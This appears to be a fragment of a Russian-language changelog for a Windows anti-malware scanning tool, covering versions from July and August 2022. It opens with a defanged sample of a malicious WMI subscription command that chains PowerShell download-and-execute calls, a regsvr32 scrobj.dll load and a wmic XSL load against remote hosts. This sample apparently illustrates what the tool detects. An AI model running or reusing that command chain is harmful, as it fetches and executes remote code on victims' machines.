CmdLine: C:\Windows\System32\cmd.exe /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8080/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185_26_113_95:8221/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8096/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8204/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi22.hа7455h6fi1.net:8080/рower.txt')||regsvr32 /u /s /i:h__p://hа7455h6fi1.net:8080/s22.tхt scrobj.dll&wmic os get /FORMAT:"h__p://wmi2.hа7455h6fi1.net:8220/s2.хsl
WMI:subscription\__EventFilter->tosa3::
[2.10.0.19] - 24.07.2022
- Обновлён белый список служб.
- Некоторые корректировки в O4, чтобы охватывать большее число случаев при отображении постфикса "(Microsoft)".
- O22 - Tasks_Migrated: добавлено определение мигрированных заданий.
- O22 - Tasks: добавлено определение заданий в SysWow64.
- O22 - Tasks: исправлено неверное декодирование не-англоязычных символов xml парсером.
[2.10.0.20] - 02.08.2022
- Выполнено несколько исправлений AppLocker (спасибо regist за отчёты, аналитику и поддержку):
- O7 - AppLocker: добавлено определение правила "ManagedInstaller".
- O7 - AppLocker: исправлено hash правило, которое отображалось в виде одной записи, вместо нескольких.
- O7 - Applocker: улучшена процедура "Fix all".